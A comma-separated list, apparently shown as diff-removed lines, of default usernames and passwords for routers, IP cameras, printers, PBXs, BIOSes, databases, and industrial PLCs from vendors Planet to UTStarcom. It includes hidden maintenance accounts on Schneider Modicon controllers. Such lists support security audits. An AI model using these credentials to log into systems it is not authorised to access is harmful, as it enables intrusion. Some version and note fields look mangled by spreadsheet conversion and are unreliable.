-Planet,ADE-4110,,HTTP,admin,epicrouter,Admin, -Planet,WAP 4000,,Multi,admin,admin,Admin,Default IP is 192.168.1.1 -Planet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin, -Planet,WAP-1900/1950/2000,2/5/2000,Multi,,default,Admin, -Planet,WAP-1900/1950/2000,36561,Multi,,default,Admin, -Planet,XRT-401D,,HTTP,admin,1234,Admin, -Planex,BRL-04UR,,Multi,admin,0,Admin, -Pollsafe,Pollsafe,,MODEM,SMDR,SECONDARY,, -Polycom,SoundPoint IP Phones,,HTTP,Polycom,456,Admin,username is case sensitive -Polycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User, -Polycom,ViewStation 4000,3.5,Multi,,admin,Admin, -Polycom,Viewstation,,Telnet,administrator,,Admin, -Polycom,iPower 9000,,Multi,,,Admin, -PostgreSQL,PostgreSQL,,Any,postgres,,Admin,(or sometimes the password may default to `postgres`) -Prestigio,Nobile,156,Multi,,,Admin, -Prime,PrimeOS,,Multi,dos,dos,User, -Prime,PrimeOS,,Multi,guest,guest,User, -Prime,PrimeOS,,Multi,guest1,guest,User, -Prime,PrimeOS,,Multi,maint,maint,User, -Prime,PrimeOS,,Multi,netlink,netlink,User, -Prime,PrimeOS,,Multi,prime,primeos,User, -Prime,PrimeOS,,Multi,primenet,primeos,User, -Prime,PrimeOS,,Multi,primeos,primeos,User, -Prime,PrimeOS,,Multi,primos_cs,prime,User, -Prime,PrimeOS,,Multi,system,system,Admin, -Prime,PrimeOS,,Multi,test,test,User, -Prolink,H9000 Series,,HTTP,admin,password,Admin, -Promise,NS4300N NAS,,Shell,engmode,hawk201,Admin, -Proxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint -Psion Teklogix,9150,,HTTP,support,h179350,Admin, -Psionteklogix,9160,1,HTTP,admin,admin,Admin, -Pyramid Computer,BenHur,all,HTTP,admin,admin,Admin, -QDI,PC BIOS,,Console,,QDI,Admin, -QLogic,SANbox 5602 Fibre Channel Switch,,Multi,admin,password,Admin, -QLogic,SANbox 5602 Fibre Channel Switch,,Multi,images,images,User, -QVIS,IP Camera system,,HTTP,admin,1234,, -Quantex,PC BIOS,,Console,,teX1,Admin, -Quantum,File Servers,Most,HTTP,,,User, -Quintum Technologies Inc.,Tenor Series,all,Multi,admin,admin,Admin, -RM,RM Connect,,Multi,RMUser1,password,, -RM,RM Connect,,Multi,admin,rmnetlm,, -RM,RM Connect,,Multi,admin2,changeme,, -RM,RM Connect,,Multi,adminstrator,changeme,, -RM,RM Connect,,Multi,deskalt,password,, -RM,RM Connect,,Multi,deskman,changeme,, -RM,RM Connect,,Multi,desknorm,password,, -RM,RM Connect,,Multi,deskres,password,, -RM,RM Connect,,Multi,guest,,, -RM,RM Connect,,Multi,replicator,replicator,, -RM,RM Connect,,Multi,setup,changeme,, -RM,RM Connect,,Multi,teacher,password,, -RM,RM Connect,,Multi,temp1,password,, -RM,RM Connect,,Multi,topicalt,password,, -RM,RM Connect,,Multi,topicnorm,password,, -RM,RM Connect,,Multi,topicres,password,, -RM,Server BIOS,,Console,,RM,, -ROLM,phones/phone mail,,,,111#,, -Radware,AppDirect,,,radware,radware,Admin, -Radware,AppXcel,,,radware,radware,Admin, -Radware,Linkproof,,ssh,lp,lp,Admin, -Radware,Linkproof,3.73.03,Multi,radware,radware,Admin, -Raidzone,raid arrays,,,,raidzone,, -Ramp Networks,WebRamp,,,wradmin,trancell,, -Rapid7 Inc,Metasploitable,2.0.0,Linux User (e.g. SSH & SFTP),msfadmin,msfadmin,root, -RapidStream,RapidStream Appliances,,Multi,rsadmin,(null),Admin, -Raritan,KVM Switches,,,admin,raritan,Admin, -Raspberry Pi Foundation,Raspberry Pi OS,ANY,Linux User (e.g. SSH & SFTP),pi,raspberry,sudo access,https://www.raspberrypi.org/documentation/linux/usage/users.md -RedHat,Piranha,6.2,Console,,Q,Interface, -RedHat,Redhat 6.2,,HTTP,piranha,piranha,User, -RedHat,Redhat 6.2,,HTTP,piranha,q,User, -Reda,,,HTTP,,,User, -Redemo,da,,HTTP,admin,,Admin, -Redhat,Redhat 6.2,,HTTP,piranha,piranha,, -Remedy,Any,Any,,Demo,,, -Remedy,Remedy,,Multi,demos,,User, -Replicom,ProxyView,,NetBIOS,Administrator,Pvremote,Admin, -Research,BIOS,,Console,,Col2ogro2,Admin, -Research,PC BIOS,,Console,,Col2ogro2,Admin, -Resumix,Resumix,,,root,resumix,, -Ricoh,AP410N,1.13,HTTP,admin,,Admin, -Ricoh,Aficio 1013F,,HTTP,,sysadm,Admin, -Ricoh,Aficio 1018d,,HTTP,,sysadm,Admin, -Ricoh,Aficio 2020D,,HTTP,admin,password,Admin, -Ricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin -Ricoh,Aficio 2232C,,Telnet,,password,Admin, -Ricoh,Aficio 551,,Multi,,sysadm,Admin, -Ricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin -Ricoh,Aficio MP 161L,( Printer MP 161L ),,( - Not required),sysadm,Administration, -Ricoh,Aficio MP 161L,( Printer MP 161L ),,,sysadm,Administration, -Ricoh,Aficio,2016,,,password,all, -Ricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin, -Ricoh,Ricoh,Aficio MP 3500 1.0,Multi,admin,,Admin,Nabil OUCHN -Rizen,WebGUI,,,Admin,123qwe,Administrator,http://freshmeat.net/projects/webgui/ -RoamAbout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin, -RoamAbout,RoamAbout R2 Wireless,,Multi,admin,password,Admin, -Rodopi,Rodopi billing software (AbacBill) sql database,,,rodopi,rodopi,, -Roxio,Aesy cd,,Multi,,,Admin, -Ruckus Wireless,M510,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,MediaFlex 2111,,HTTP,admin,password,Administrator,Default IP Address: 192.168.0.254 -Ruckus Wireless,MediaFlex 2825,,HTTP,admin,password,Administrator,Default IP Address: 192.168.20.1 -Ruckus Wireless,MediaFlex 7111,,HTTP,admin,password,Administrator,Default IP Address: 192.168.2.254 -Ruckus Wireless,MediaFlex 7211,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.30.1 -Ruckus Wireless,MediaFlex 7811,,HTTP,admin,password,Administrator,Default IP Address: 192.168.2.1 -Ruckus Wireless,R320,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,R500,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,R750,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 2942,,HTTP,admin,password,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7055,,HTTP,admin or super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7321,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7343,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7351,,HTTP,super,sp-admin,Administrator, -Ruckus Wireless,ZoneFlex 7352,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7363,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7372,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7441,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7762,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex 7962,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex R310,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -Ruckus Wireless,ZoneFlex T300,,HTTP,super,sp-admin,Administrator,Default IP Address: 192.168.0.1 -S2400,Toshiba,,HTTP,Administrator,admin,Admin, -SAF Tehnika,CFQ series modems,,,administrator,d1scovery,Admin, -SAF Tehnika,CFQ series modems,,,integrator,p1nacate,Integrator, -SAF Tehnika,CFQ series modems,,,monitor,monitor,Monitor, -SAF Tehnika,CFQ series modems,,,operator,col1ma,Operator, -SAGEM,FAST 1400,,Multi,admin,epicrouter,Admin, -SAMSUNG,Samsung AHT-E300 Multi,ANY,HTTP,admin,sec00000,admin,Default router IP: 192.168.1.1 -SANS Institute,SIFT Workstation,ANY,Linux User (e.g. SSH & SFTP),sansforensics,forensics,sudo access, -SAP,SAP,,SAP client,DDIC,19920706,SAP internal; Mandant 001, -SAP,SAP,,SAP client,SAP*,PASS,SAP internal; all Mandants, -SAP,SAP,,SAP client,SAPCPIC,ADMIN,Admin, -SGI,IRIX,ALL,,EZsetup,,, -SGI,IRIX,ALL,,demos,,, -SGI,all,all,,root,,, -SIEMENS,SE515,,HTTP,admin,,Admin, -SKY,FEBRUARY 2016 MODEL,,,admin,sky,, -SMC,2804wr,,HTTP,,smcadmin,Admin, -SMC,7204BRA,,Multi,smc,smcadmin,Admin, -SMC,7401BRA,1,HTTP,admin,barricade,Admin, -SMC,7401BRA,2,HTTP,smc,smcadmin,Admin, -SMC,Barricade 7004 AWBR,,Multi,admin,,Admin,192.168.123.254 (WiFi AP) -SMC,Barricade,,,,admin,, -SMC,Barricade7204BRB,,HTTP,admin,smcadmin,Admin, -SMC,Modem/Router,,HTTP,cusadmin,highspeed,Customer Admin,Comcast Commercial High Speed Modem model number 8013WG -SMC,Router,All,HTTP,admin,admin,Admin, -SMC,Router/Modem,BR7401,Multi,admin,barricade,Admin, -SMC,SMB2804WBR,V2,Multi,Administrator,smcadmin,Admin, -SMC,SMC broadband router,,HTTP,admin,admin,Admin, -SMC,SMC2804WBR,v.1,HTTP,,smcadmin,Admin, -SMC,SMC7004VBR,,HTTP,,smcadmin,Admin, -SMC,SMC8013WG-CCR,2.11.19-1d,HTTP,mso,w0rkplac3rul3s,Admin,Comcast Business Gateway w the int LAN IP 10.1.10.1 and login cusadmin highspeed -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,DeFaults:IP Address: 192.168.2.1 - Subnet Mask: 255.255.255.0 -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) -SMC,SMCWBR14-G,,HTTP,,smcadmin,Admin,mentioned password (no passwd) on your webpage is wrong -SMC,SMCWBR14-G,SMCWBR14-G,HTTP,,smcadmin,Admin, -SMC,WiFi Router,All,HTTP,,smcadmin,Admin,model #2804WBRP-G -SMC,smc7904wbrb,,Multi,,smcadmin,Admin, -SOPHIA (Schweiz) AG,Protector,,HTTPS,admin,Protector,Admin, -SOPHIA (Schweiz) AG,Protector,,SSH,root,root,Admin, -SOPHIA (Schweiz),Protector,,HTTPS,admin,Protector,Admin, -SOPHIA (Schweiz),Protector,,SSH,root,root,Admin, -SSA,BPCS,Up to 5.02,Multi,SSA,SSA,Admin,rarely changed/used for upgrades-patches -SWEEX,,,,sweex,mysweex,Admin, -Sagem,F@st 1200 (Fast 1200),,Telnet,root,1234,User,root/1234 -Sagem,Fast 3504 v2,,,Menara,Menara,admin,moroccan internet provider’s router -Sagem,Livebox,,Multi,admin,admin,Admin, -Samba,SWAT Package,Linux,,Any Local User,Local User password,, -Samsung,IP Camera system,,HTTP,admin,4321 / 1111111,, -Samsung,IP Camera system,,HTTP,root,4321 / admin,, -Samsung,MagicLAN SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203 -Samsung,inforanger,,Multi,,,Admin, -Sanyo,IP Camera system,,HTTP,admin,admin,, -Schneider,BMENOC301,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,BMENOC311,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,BMENOC321,,HTTP,admin,factorycast,Administrator,https://www.se.com/in/en/faqs/FA321581/ -Schneider,Modicon M340,,FTP,fdrusers,sresurdf,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,fwupgrade,FaAmU5p2F~,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,loki,ZfTljublsx,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,FTP,sysdiag,factorycast@schneider,,https://www.tenable.com/security/research/tra-2018-38 -Schneider,Modicon M340,,HTTP,USER,USER,,https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=35015192_K01_000_08.pdf&p_Doc_Ref=35015192K01000 -Schneider,Modicon M340,,HTTP,USER,USERUSER,,https://download.schneider-electric.com/files?p_enDocType=User+guide&p_File_Name=35015192_K01_000_08.pdf&p_Doc_Ref=35015192K01000 -Schneider,Premium,,FTP,sysdiag,factorycast@schneider,, -Schneider,Premium,,HTTP,USER,USER,, -Scientific Atlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1 -Scylla,ScyllaDB,,Any,cassandra,cassandra,Admin, -Secure Computing,Webwasher,all,HTTP,admin,,Admin, -Securicor3NET,Cezzanne,any,,manager,friend,, -Securicor3NET,Money,,,manager,friend,Admin, -Semaphore,PICK O/S,,,DESQUETOP,,, -Semaphore,PICK O/S,,,DSA,,, -Sempre,54M Wireless Router,V 1.00,,admin,admin,, -Senao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1 -Senao,2611CB3+D (802.11b,,HTTP,admin,,Admin,Default IP: 192.168.1.1 -Sentry360,IP Camera system,,HTTP,Admin,1234,, -Sercom,IP806GA,,HTTP,admin,admin,Admin, -Sercom,IP806GB,,HTTP,admin,admin,Admin, -Server Technology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001 -Server Technology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001 -Server Technology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001 -Sharp,AL-1655CS,,HTTP,admin,Sharp,Admin, -Sharp,AR-M155,,HTTP,admin,Sharp,Admin,Note the Capital S -Sharp,AR-M237,,,admin,Sharp,Admin, -Sharp,AR-M237,,,admin,Sharp,Admin,pass case-sensitive -Sharp,AR-M355N,,HTTP,admin,Sharp,Admin, -Sharp,MX-3501n,,HTTP,Administrator,admin,Admin, -Sharp,MX-5500,,HTTP,admin,admin,Admin,Different to other sharp units -Shina,LANRover,,,root,,Admin, -Shiva,AccessPort,Any,,hello,hello,, -Shiva,Integrator,150/200/500,Multi,admin,hello,Admin, -Shoretel,ALL,,HTTP,admin,changeme,Admin, -Shuttle,PC BIOS,,,,Spacve,Admin, -Siemens Nixdorf,BIOS,,Console,,SKY_FOX,Admin, -Siemens Nixdorf,PC BIOS,,Console,,SKY_FOX,Admin, -Siemens Pro C5,Siemens,,Multi,,,Admin, -Siemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin, -Siemens,Gigaset,All,Multi,,0,Admin, -Siemens,Hicom 100E PBX,,,31994,31994,, -Siemens,Hipath,3300-3750,Custom program,31994,31994,Admin, -Siemens,PhoneMail,,,poll,poll,, -Siemens,PhoneMail,,,poll,tech,, -Siemens,PhoneMail,,,sysadmin,sysadmin,, -Siemens,PhoneMail,,,system,field,, -Siemens,PhoneMail,,,tech,tech,, -Siemens,ROLM PBX,,,admin,pwp,, -Siemens,ROLM PBX,,,eng,engineer,, -Siemens,ROLM PBX,,,op,op,, -Siemens,ROLM PBX,,,op,operator,, -Siemens,ROLM PBX,,,su,super,, -Siemens,S7-1200,,HTTP,admin,,,https://www.192-168-1-1-ip.co/router/siemens/s7-1200-s7-1500/17618/ -Siemens,SE560dsl,,Multi,admin,admin,Admin,Also has an account with: user/user -Siemens,Simatic S7-1200 / S7-1500,PLC,HTTP,admin,,, -Siemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router -Siemens,Speedstream SS2614,Hardware V. 01,HTTP,,admin,Admin, -Sigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,effes2004@gmail.com -Signamax,065-7726S,,Multi,admin,admin,Admin,Switch -Siips,Trojan,8974202,Multi,Administrator,ganteng,Admin, -Silex Technology,Generic USB Device Servers,,multi,root,,administrator, -Silex Technology,SX-100,,multi,root,access,administrator, -Silex Technology,SX-200,,multi,root,access,administrator, -Silex Technology,SX-2933-S03,,multi,root,access,administrator, -Silex Technology,SX-500,,multi,root,access,administrator, -Silex Technology,SX-600,,multi,root,access,administrator, -Silvercrest,WR-6640Sg,,HTTP,admin,admin,Admin, -Sitecom,All WiFi routers,,Multi,,sitecom,Admin, -Sitecom,WL-0xx up to WL-17x,all,Multi,admin,admin,Admin,often on port 88 -Sitecom,WL-108,,,admin,password,admin, -SmartSwitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin, -Snapgear,Pro,Lite,and SOHO,1.79,Multi,root,default -Software,,,,,,,EVMAdminGuide.pdf -Solution 6,Viztopia Accounts,,Multi,aaa,often blank,Admin, -SonarSource,SonarQube,,HTTP,admin,admin,, -Sonic-X,SonicAnime,on,Telnet,root,admin,Admin,1.01E+14 -Sonic-X,SonicAnime,on,Telnet,root,admin,Admin,101000000000000 -SonicWALL,ALL,ALL,HTTP,admin,password,Admin, -Sony,IP Camera system,,HTTP,admin,1234,, -Sony,IP Camera system,,HTTP,admin,admin,, -Sorenson,SR-200,,HTTP,,admin,Admin, -Sparklan,Wx-6215 D and G,,HTTP,admin,admin,Admin, -Speco,IP Camera system,,HTTP,admin,admin,, -Speco,IP Camera system,,HTTP,root,root,, -Spectra Logic,64000 Gator,,Multi,administrator,,Admin, -Spectra Logic,64000 Gator,,Multi,operator,,User, -SpeedStream 5200-Serie,SpeedStream,,Telnet,Administrator,admin,Admin, -SpeedStream,5660,,Telnet,,adminttd,Admin, -SpeedStream,SpeedStream,,Telnet,Administrator,admin,Admin, -SpeedXess,HASE-120,,Multi,,speedxess,Admin, -Speedstream,5667,R4.0.1,HTTP,,admin,Admin, -Speedstream,5861 SMT Router,,Multi,admin,admin,Admin, -Speedstream,5871 IDSL Router,,Multi,admin,admin,Admin, -Speedstream,DSL,,Multi,admin,admin,Admin, -Speedstream,Router 250 ssr250,,Multi,admin,admin,Admin, -Sphairon,(Versatel WLAN-Router),,Multi,admin,passwort,Admin, -Spike,CPE,,Console,enable,,Admin, -Ssangyoung,SR2501,,,,2501,, -StarDot,IP Camera system,,HTTP,admin,admin,, -Starvedia,IP Camera system,,HTTP,admin,,, -Sun Microsystems,ILOM of X4100,1,HTTP,root,changeme,Admin, -Sun,,Solaris,,,,, -Sun,Cobalt,,HTTP,admin,admin,Admin,submit by Nabil Ouchn -Sun,JavaWebServer,1.x 2.x,AdminSrv,admin,admin,Admin, -Sun,SunScreen,3.1 Lite,TCP 3852,admin,admin,Admin,Use a Java enabled web browser on port 3852 -SuperMicro,PC BIOS,,Console,,ksdjfg934t,Admin, -Swissvoice,IP 10S,,Telnet,target,password,Admin, -Syabas Technology,Popcorn Hour A-110,all,,ftpuser,1234,admin, -Syabas Technology,Popcorn Hour A-110,all,,nmt,1234,admin, -Syabas Technology,Popcorn Hour C-200,all,,nmt,1234,admin, -Sybase,Adaptive Server Enterprise,11.x 12.x,Multi,sa,,SA and SSO roles, -Sybase,EAServer,,HTTP,jagadmin,,Admin,Source : Manufactor documentation -Symantec,NAV CORP / ALL,,HTTP,admin,symantec,Admin, -Symantec,Norton AntiVirus Corp. Edition,7.5,Console,,admin,, -Symantec,Norton Antivirus Corporate Edition,7.5,Console,,admin,Admin, -Symantec,pcanywhere,,Console,Administrator,,Admin, -Symbol,AP-2412,,Multi,,Symbol,Admin,2Mbps FH AccessPoint -Symbol,AP-3020,,Multi,,Symbol,Admin,2Mbps FH AccessPoint -Symbol,AP-4111,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,AP-4121,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,AP-4131,,Multi,,Symbol,Admin,11Mbps DS AccessPoint -Symbol,CB3000,A1,HTTPS,admin,symbol,Admin,Default IP 10.10.1.1 -Symbol,Spectrum,series 4100-4121,HTTP,,Symbol,Admin,Access Point Wireless -Symmetricom,NTS-200,All,,guest,truetime,guest,Symmetricom NTP Network Appliance -Symmetricom,NTS-200,All,,operator,mercury,Admin,Symmetricom NTP Network Appliance -SysKonnect,6616,,,default.password,,Admin, -SysMaster,M10,,HTTP,admin,12345,Admin, -System/32,VOS,,Multi,install,secret,Admin, -T com,sinus,1054dsl,,veda,12871,, -T-Com,Speedport 503V,any,,,123456,, -T-Com,Speedport Router Family,all,HTTP,,0,Admin,works with nearly all routers of the speedport family -T-Com,Speedport W701V,any,,,0,admin, -T-Com,Speedport W900V,any,,,0,admin, -T-Com,Speedport,any,,,0,admin,192.168.2.1 | http://Speedport.ip -T-Comfort,Routers,,HTTP,Administrator,,Admin, -TANDBERG,TANDBERG,8000,Multi,,TANDBERG,Admin,http://www.tandberg.net/collateral/user_manuals/TANDBERG_8000_UserMan.pdf -TMC,PC BIOS,,Console,,BIGO,Admin, -TP-LINK,All Routers,ANY,HTTP,admin,admin,Router Control Access[Admin for that Router],Default Router IP: 192.168.0.1 -TVT System,Expresse G5 DS1 Module,,Multi,,enter,Admin, -TVT System,Expresse G5,,Multi,craft,,Admin, -Tandberg Data,DLT8000 Autoloader 10x,,Console,,10023,Maintenance, -Tandberg,6000MXP,,Multi,Admin,,Admin, -Tandem,TACL,,Multi,super.super,,Admin, -Tandem,TACL,,Multi,super.super,master,Admin, -Team Xodus,XeniumOS,2.3,FTP,xbox,xbox,Admin, -Technicolors,All Routers,ANY,HTTP,admin,admin,Administrator,Default Router IP: 192.168.1.1 -Tekelec,Eagle STP,,,eagle,eagle,Admin, -Teklogix,Accesspoint,,Multi,Administrator,,Admin, -Telco Systems,Edge Link 100,,Console,telco,telco,telco, -Telebit,NetBlazer,3.*,,setup/snmp,setup/nopassword,Admin, -Teledat,Routers,,HTTP,admin,1234,Admin, -Teletronics,WL-CPE-Router,3/5/2002,HTTPS,admin,1234,Admin, -Teletronics,WL-CPE-Router,37320,HTTPS,admin,1234,Admin, -Telewell,TW-EA200,,Multi,admin,password,Admin, -Telewell,TW-EA501,v1,Multi,admin,admin,Admin, -Telindus,1124,,HTTP,,,Admin, -Telindus,SHDSL1421,yes,HTTP,admin,admin,Admin, -Tellabs,7120,,Multi,root,admin_1,Admin,telnet on port 3083 -Tellabs,Titan 5500,FP 6.x,Multi,tellabs,tellabs#1,Admin, -Telus,Telephony Services,,Multi,(created),telus00,User,year 2000 passwords -Tenda,All Routers,ANY,HTTP,admin,admin,Router Admin Control Access,Default Router IP: 192.168.0.1 -Terayon,TeraLink 1000 Controller,,,user,password,, -Terayon,TeraLink Getaway / 1000 Controller,,,user,password,User, -Terayon,TeraLink Getaway,,,user,password,, -Terayon,TeraLink,6.29,,admin,nms,Admin, -Terayon,Unknown,Comcast-supplied,HTTP,,,diagnostics page,192.168.100.1/diagnostics_page.html -TextPortal,TextPortal,0.8,HTTP,god2,12345,Admin, -The qBittorrent project,qBittorrent Web UI,ANY,HTTP,admin,adminadmin,Administrator,https://github.com/qbittorrent/qBittorrent/blob/master/doc/qbittorrent-nox.1.md#description -Thomson,SpeedTouch AP,180,HTTP,,admin,Admin,SSID : SpeedTouch180 -Thomson,TCW-710,,Multi,,admin,Admin,ono -Thomson,Wireless Cable Gateway,DCW725,HTTP,,admin,Admin,SSID : THOMSON -Tiara,1400,3.x,Console,tiara,tiaranet,Admin,also known as Tasman Networks routers -Tiara,Tiara,,,tiara,tiaranet,, -Tiny,PC BIOS,,Console,,Tiny,Admin, -Titbas,,SCO,,haasadm,lucy99,Admin, -TopLayer,AppSwitch 2500,,,siteadmin,toplayer,Admin, -Topcom,Skyr@cer Pro AP 554,1.93,HTTP,admin,admin,Admin,Wireless Access Point -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 0.01.06,HTTP,admin,admin,Admin,WPA-PSK implemented -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 0.01.09,HTTP,admin,admin,Admin,Improved wireless stability -Topcom,Wireless Webr@cer 1154+ PSTN (Annex A),V 4.00.0,HTTP,admin,admin,Admin,G+ mode (125Mbps) integration -Topcom,Wireless Webr@cer 1154+,V 0.01.06,HTTP,admin,admin,Admin,WPA-PSK implemented -Topcom,Wireless Webr@cer 1154+,V 0.01.09,HTTP,admin,admin,Admin,Improved wireless stability -Topcom,Wireless Webr@cer 1154+,V 4.00.0,HTTP,admin,admin,Admin,G+ mode (125Mbps) integration -Toshiba,E-Studio 3511c,,HTTP,Admin,123456,Admin,Multifunction Printer/Copier/ -Toshiba,E-Studio 3511c,,HTTP,Admin,123456,Admin,Multifunction Printer/Copier/Scanner/Fax -Toshiba,E-Studio 4511c,,HTTP,admin,123456,Admin, -Toshiba,IP Camera system,,HTTP,root,ikwb,, -Toshiba,Most e-Studio copiers,,,admin,123456,Admin, -Toshiba,PC BIOS,,Console,,Toshiba,Admin, -Toshiba,PC BIOS,,Console,,toshy99,Admin, -Toshiba,PC BIOS,,console,,toshy99,, -Toshiba,Tecra 8100,2.3,Multi,,admin,Admin, -Toshiba,laptop,,Multi,Administrator,,Admin, -Toshiba,satellite 1800-s204,,HTTP,,,Admin, -Toshiba,satellite pro 4310,,Multi,,,Admin, -TrendMicro,ISVW (VirusWall),any,,admin,admin,, -TrendMicro,InterScan 7.0,,HTTP,admin,imss7.0,Admin, -TrendNET,TEW-435BRM,1,HTTP,admin,password,Admin, -Trendnet,IP Camera system,,HTTP,admin,admin,, -Trintech,eAcquirer App/Data Servers,,,t3admin,Trintech,Admin, -Troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin, -Troy,ExtendNet 100zx,,Multi,admin,extendnet,Admin,dizphunKt -Tsurugi Linux project,Tsurugi Linux,ANY,Linux User (e.g. SSH & SFTP),root,,sudo access, -Tumbleweed,Message Management System,4.3-4.6,,sa,,Admin, -U.S. Robotics,SureConnect 9003 ADSL Ethernet/USB Router,,Multi,root,12345,Admin, -U.S. Robotics,SureConnect 9003 ADSL,,Multi,root,12345,Admin, -U.S. Robotics,SureConnect 9105 ADSL 4-Port Router,,HTTP,admin,admin,Admin, -U.S. Robotics,SureConnect 9105 ADSL,,HTTP,admin,admin,Admin, -UDP,IP Camera system,,HTTP,root,unknown,, -UNEX,Routers,,HTTP,,password,Admin, -UNIX,Generic,,Multi,adm,adm,Admin, -UNIX,Generic,,Multi,admin,admin,User, -UNIX,Generic,,Multi,administrator,,User, -UNIX,Generic,,Multi,bbs,bbs,User, -UNIX,Generic,,Multi,bin,sys,Admin, -UNIX,Generic,,Multi,checkfsys,checkfsys,User, -UNIX,Generic,,Multi,checksys,checksys,User, -UNIX,Generic,,Multi,daemon,,User, -UNIX,Generic,,Multi,demo,,User, -UNIX,Generic,,Multi,demos,,User, -UNIX,Generic,,Multi,dni,dni,User, -UNIX,Generic,,Multi,fal,fal,User, -UNIX,Generic,,Multi,fax,fax,User, -UNIX,Generic,,Multi,ftp,ftp,User, -UNIX,Generic,,Multi,games,,User, -UNIX,Generic,,Multi,gropher,,User, -UNIX,Generic,,Multi,guest,guestgue,User, -UNIX,Generic,,Multi,halt,halt,User, -UNIX,Generic,,Multi,informix,informix,User, -UNIX,Generic,,Multi,lp,lineprin,User, -UNIX,Generic,,Multi,lp,lp,User, -UNIX,Generic,,Multi,lpadm,lpadm,User, -UNIX,Generic,,Multi,lynx,lynx,User, -UNIX,Generic,,Multi,mail,,User, -UNIX,Generic,,Multi,man,man,User, -UNIX,Generic,,Multi,me,,User, -UNIX,Generic,,Multi,mountfs,mountfs,Admin, -UNIX,Generic,,Multi,mountsys,mountsys,Admin, -UNIX,Generic,,Multi,news,,User, -UNIX,Generic,,Multi,nobody,nobody,User, -UNIX,Generic,,Multi,operator,operator,User, -UNIX,Generic,,Multi,oracle,,User, -UNIX,Generic,,Multi,postmaster,,User, -UNIX,Generic,,Multi,rje,rje,User, -UNIX,Generic,,Multi,root,root,Admin, -UNIX,Generic,,Multi,shutdown,,User, -UNIX,Generic,,Multi,sync,,User, -UNIX,Generic,,Multi,sys,system,Admin, -UNIX,Generic,,Multi,sysadm,sysadm,Admin, -UNIX,Generic,,Multi,sysadmin,sysadmin,Admin, -UNIX,Generic,,Multi,system_admin,,Admin, -UNIX,Generic,,Multi,trouble,trouble,User, -UNIX,Generic,,Multi,umountfsys,umountfsys,User, -UNIX,Generic,,Multi,unix,unix,User, -UNIX,Generic,,Multi,uucp,uucp,User, -UNIX,Generic,,Multi,web,,User, -UNIX,Generic,,Multi,webmaster,webmaster,User, -UNIX,Generic,,Multi,www,,User, -UNIX,Generic,,Telnet,service,smile,,Motorola Default -UNIX,Generic,,Telnet,setup,,,Motorola Default -UNIX,koppp,,Telnet,dream,trocse,Admin, -US ROBOTICS,ADSL Ethernet Modem,,HTTP,,12345,Admin, -US Robotics,SureConnect ADSL,SureConnect ADSL,Telnet,support,support,User,works after 3rd login trial -US Robotics,USR5462,,HTTP,,admin,Admin, -US Robotics,USR8000,1.23 / 1.25,Multi,root,admin,Admin,DSL-Router. Web-Login always user root -US Robotics,USR8550,3.0.5,Multi,Any,12345,Any,Best Modem -US Robotics,USR9106,,HTTP,admin,admin,Admin, -US Robotics,USR9110,,HTTP,admin,,Admin,default IP subnet: 192.168.1.0 -USR,TOTALswitch,Any,,,amber,, -UTStarcom,B-NAS/B-RAS,1000,,dbase,dbase,, 